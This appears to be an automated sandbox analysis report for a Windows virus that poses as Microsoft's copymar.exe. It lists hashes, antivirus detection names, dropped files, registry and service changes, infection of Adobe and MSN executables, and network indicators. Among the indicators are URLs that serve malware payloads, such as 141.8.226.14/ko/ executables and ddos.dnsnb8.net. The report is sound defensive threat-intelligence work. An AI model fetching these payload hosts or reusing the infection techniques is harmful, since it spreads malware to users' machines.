Analysis Date: 2015-08-30 11:20:15
MD5: c9b17dde4ffbb93d9bebee5d49fbcdd6
SHA1: 9a45d667150027cc0dd09638b290b85256fbc8c8

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: d796e4ff5c4d9c5ca2d1b90272d6d6b8 sha1: 0755e4acb128a57a55d97d2e967825b0a5393d30 size: 65536
Section: .data md5: 789f8dbcfc8423c0c1058375d02239bf sha1: f0b25955806641c0017dfcc1eaafd33c8c24a187 size: 4096
Section: .rsrc md5: 95c3a4840354bf62ec32d7ce9f5c6cb2 sha1: 2b3cddb7b110e371697ebf99e4de9d01e8674e77 size: 4096
Section: X?5u{ md5: 6e9028c14083aab97d818b53c679d592 sha1: 8fa08cd2bbe11ef69285ed42e9d65289b3b4840d size: 20480
Section: .tcP md5: e347d822422ba661f7c3e4bf8a8b7f6f sha1: 6bf1063e8583ccbf180c94472bdff061fe1558a8 size: 28672
Section: W>5u md5: ad096de7c08a19a2366280a611bcd840 sha1: a3e5a3ffbb76b5052344ae48969951efc4bd89b4 size: 20480
Timestamp: 2001-07-19 19:30:07
Pdb path: pdb
Version:
LegalCopyright: Copyright (C) Microsoft Corp. 1981-2000
InternalName: copymar
FileVersion: 6.10.0016.1624
CompanyName: Microsoft Corporation
Built by: msnbld
ProductName: Microsoft(R) MSN (R) Communications System
ProductVersion: 6.10.0016.1624
FileDescription: copymar
OriginalFilename: copymar.exe
PEhash: d14359c764871eefcea91a43199f94d9fdae9506
IMPhash: 6df6e99bae10817058127898c796b82d
AV Rising: Win32.Roue.a
AV Mcafee: W32/Kudj
AV Avira (antivir): W32/Jadtre.B
AV Twister: Virus.558BEC81EC@120000#.mg
AV Ad-Aware: Win32.VJadtre.3
AV Alwil (avast): Malware-gen:Viking-CF:Win32:Malware-gen:Win32:Viking-CF
AV Eset (nod32): Win32/Wapomi.BA virus
AV Grisoft (avg): Win32/Wapomi.I
AV Symantec: W32.Wapomi.C!inf
AV Fortinet: W32/Nimnul.F
AV BitDefender: Win32.VJadtre.3
AV K7: Virus ( 0040f7441 )
AV Microsoft Security Essentials: Virus:Win32/Mikcer.B
AV MicroWorld (escan): Win32.VJadtre.3
AV MalwareBytes: Trojan.FakeMS.ED
AV Authentium: W32/PatchLoad.E
AV Frisk (f-prot): W32/PatchLoad.E
AV Ikarus: Trojan-Downloader.Win32.Small
AV Emsisoft: Win32.VJadtre.3
AV Zillya!: Virus.Nimnul.Win32.5
AV Kaspersky: Virus.Win32.Nimnul.f
AV Trend Micro: PE_WAPOMI.BM
AV CAT (quickheal): W32.Nimnul.F1
AV VirusBlokAda (vba32): Virus.Nimnul.19209
AV Padvish: no_virus
AV BullGuard: Win32.VJadtre.3
AV Arcabit (arcavir): Win32.VJadtre.3
AV ClamAV: Win.Trojan.Downloader-64296
AV Dr. Web: BackDoor.Darkshell.246
AV F-Secure: Win32.VJadtre.3
AV CA (E-Trust Ino): Win32/Nimnul.A

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\OzQTai.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\bdGiXz.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\OzQTai.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\bdGiXz.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat"

Creates File: C:\WINDOWS\system32\dllcache\lsasvc.dll
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat
Deletes File: C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\bdGiXz.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\AdobeUpdateManager.exe
Creates File: C:\temp\files\bdGiXz.exe
Creates File: C:\Program Files\MSN\MSNCoreFiles\Install\msnsusii.exe
Creates File: C:\Program Files\MSN\MSNCoreFiles\Install\MSN9Components\Digcore.exe
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\Updater\acroaum.exe
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\ENU\setup.exe
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32.exe
Creates File: C:\temp\files\malware.exe
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\ENU\instmsiw.exe
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Program Files\MSN\MSNCoreFiles\Install\MSN9Components\Msncli.exe
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32Info.exe
Winsock DNS: ddos.dnsnb8.net
Winsock URL: http://ddos.dnsnb8.net:799/cj//k1.rar

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Creates File: PIPE\SfcApi
Creates File: PIPE\wkssvc
Creates File: C:\WINDOWS\system32\qmgr.dll
Creates File: C:\WINDOWS\system32\mspmsnsv.dll
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat
Creates Process: "C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat"
Starts Service: WmdmPmSN

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\OzQTai.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\temp\files\AcroRd32.exe
Creates File: C:\temp\files\AcroRd32Info.exe
Creates File: C:\temp\files\bdGiXz.exe
Creates File: C:\temp\files\Expor.exe
Creates File: C:\temp\files\setup.exe
Creates File: C:\Program Files\MSN\MSNCoreFiles\Install\MSN9Components\Digcore.exe
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\ENU\setup.exe
Creates File: C:\temp\files\instmsiw.exe
Creates File: C:\temp\files\malware.exe
Creates File: C:\temp\files\OzQTai.exe
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Setup Files\RdrBig709\ENU\instmsiw.exe
Creates File: C:\temp\files\reader_sl.exe
Creates File: PIPE\lsarpc
Creates File: C:\temp\files\Digcore.exe
Creates File: \Device\Afd\Endpoint
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32Info.exe
Creates File: C:\temp\files\msnsusii.exe
Creates File: C:\temp\files\AdobeUpdateManager.exe
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\AdobeUpdateManager.exe
Creates File: C:\Program Files\MSN\MSNCoreFiles\Install\msnsusii.exe
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\Updater\acroaum.exe
Creates File: C:\temp\files\monitor.exe
Creates File: C:\Program Files\Adobe\Acrobat 7.0\Reader\AcroRd32.exe
Creates File: C:\Program Files\MSN\MSNCoreFiles\Install\MSN9Components\Msncli.exe
Creates File: C:\temp\files\Msncli.exe
Creates File: C:\temp\files\acroaum.exe
Winsock DNS: ddos.dnsnb8.net
Winsock URL: http://ddos.dnsnb8.net:799/cj//k1.rar

Process
↳ C:\WINDOWS\system32\svchost.exe

Creates File: \Device\Afd\Endpoint

Process
↳ Pid 812

Process
↳ Pid 856

Process
↳ C:\WINDOWS\System32\svchost.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WmdmPmSN\Start ➝ 2
Registry: HKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM\List of event-active namespaces ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: NtHid
Creates File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: C:\WINDOWS\system32\WBEM\Repository\$WinMgmt.CFG
Creates File: C:\Documents and Settings\NetworkService\Cookies\index.dat
Creates File: \Device\Afd\AsyncConnectHlp
Creates File: C:\Documents and Settings\NetworkService\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\DRIILV1F\desktop.ini
Creates File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\ATC3U5MX\desktop.ini
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\WINDOWS\TEMP\NtHid.sys
Creates File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\6YQ91KCM\desktop.ini
Creates File: C:\WINDOWS\system32\WBEM\Logs\wbemess.log
Creates File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\0J2L45O7\desktop.ini
Deletes File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes File: C:\WINDOWS\TEMP\NtHid.sys
Deletes File: C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Creates Process: C:\Program Files\Internet Explorer\iexplore.exe http://nbtj.114anhui.com/msn/163.htm?2
Creates Mutex: c:!documents and settings!networkservice!local settings!history!history.ie5!
Creates Mutex: c:!documents and settings!networkservice!cookies!
Creates Mutex: c:!documents and settings!networkservice!local settings!temporary internet files!content.ie5!
Creates Service: NtHid - C:\WINDOWS\TEMP\NtHid.sys
Winsock DNS: 141.8.226.14
Winsock DNS: www.490a-B8B5-9B8C1E870B0C.com
Winsock DNS: www.baidu.com
Winsock DNS: pc1.114central.com
Winsock URL: http://141.8.226.14/ko/03.exe
Winsock URL: http://141.8.226.14/ko/02.exe

Process
↳ Pid 1212

Process
↳ Pid 1300

Process
↳ Pid 1860

Process
↳ Pid 1176

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe http://nbtj.114anhui.com/msn/163.htm?2

Network Details:

DNS: nbtj.114anhui.com
Type: A
193.166.255.171
DNS: www.a.shifen.com
Type: A
103.235.46.39
DNS: pc1.114central.com
Type: A
141.8.226.14
DNS: ddos.dnsnb8.net
Type: A
DNS: www.baidu.com
Type: A
DNS: www.490a-B8B5-9B8C1E870B0C.com
Type: A
HTTP GET: http://141.8.226.14/ko/01.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://nbtj.114anhui.com/msn/163.htm?2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://141.8.226.14/ko/02.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://141.8.226.14/ko/03.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1037 ➝ 141.8.226.14:80
Flows TCP: 192.168.1.1:1039 ➝ 193.166.255.171:80
Flows TCP: 192.168.1.1:1040 ➝ 141.8.226.14:80
Flows TCP: 192.168.1.1:1041 ➝ 141.8.226.14:80

Raw Pcap

Strings